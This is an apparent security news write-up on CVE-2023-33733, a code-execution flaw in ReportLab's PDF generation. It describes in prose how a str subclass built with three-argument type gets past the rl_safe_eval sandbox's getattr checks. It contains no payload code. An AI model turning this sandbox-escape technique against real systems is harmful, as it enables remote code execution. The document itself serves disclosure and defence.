CVE-2023-33733: RCE Vulnerability in ReportLab Python Library
In the vibrant ecosystem of Python libraries, ReportLab has long established itself as a potent tool for creating Adobe’s Portable Document Format (PDF) files and for crafting charts and data graphics in various bitmap and vector formats as well as PDF. Yet, beneath this shining facade of utility, a lurking vulnerability identified as CVE-2023-33733 may turn this resourceful library into a surreptitious weapon in the hands of malicious entities.
Recently, during an audit of a web application, the application was found to employ the ReportLab Python library for the dynamic generation of PDF files from HTML input. An intriguing discovery was that the library had harbored a code-execution vulnerability which had since been patched. For an attacker, finding a bypass for that patch would pave the way to rediscovering the code execution. This is a matter of grave concern, especially considering the widespread use of the ReportLab library in a multitude of applications and tools.
In 2019, a similar exploit in the library had led to remote code execution via the Color attribute of HTML tags. The attribute content was directly evaluated as a Python expression using the eval function, thus triggering code execution. To mitigate this issue, ReportLab implemented a sandbox named ‘rl_safe_eval’. Stripped of the standard Python built-in functions and equipped with restricted replacements for several of them, this sandbox was designed to safely execute library code while curtailing access to dangerous functions and libraries that could otherwise be used to construct malicious Python code.
This ‘safe eval’ function, as explained earlier, purges the environment of all potentially dangerous functions, creating a restricted execution space. However, should a bypass be discovered, it would expose the original built-in functions, thereby making the sandboxed environment highly exploitable.
One such overridden built-in class is ‘type’. Used with a single argument, it returns the type of an object. Yet, when employed with three arguments, it produces a new type object: effectively a dynamic form of the class statement, permitting the creation of a new class that inherits from another.
The key to the CVE-2023-33733 vulnerability lies in the creation of a new class called ‘Word’ that inherits from ‘str’. When an instance of it is passed to the sandbox’s custom ‘getattr’, it bypasses the checks, permitting access to sensitive attributes like ‘__code__’.
Renowned researcher c53elyas has released a proof-of-concept (PoC) demonstrating this code execution. Successful exploitation results in the creation of a file named ‘exploited’ in ‘/tmp/’. This vulnerability has wide-reaching implications, as numerous applications and libraries utilize ReportLab, such as the ‘xhtml2pdf’ utility, which is susceptible to code execution while converting malicious HTML to PDF.